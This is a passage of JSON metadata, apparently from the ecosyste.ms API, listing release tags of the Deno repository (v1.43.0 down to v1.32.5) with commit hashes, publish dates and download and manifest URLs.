pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F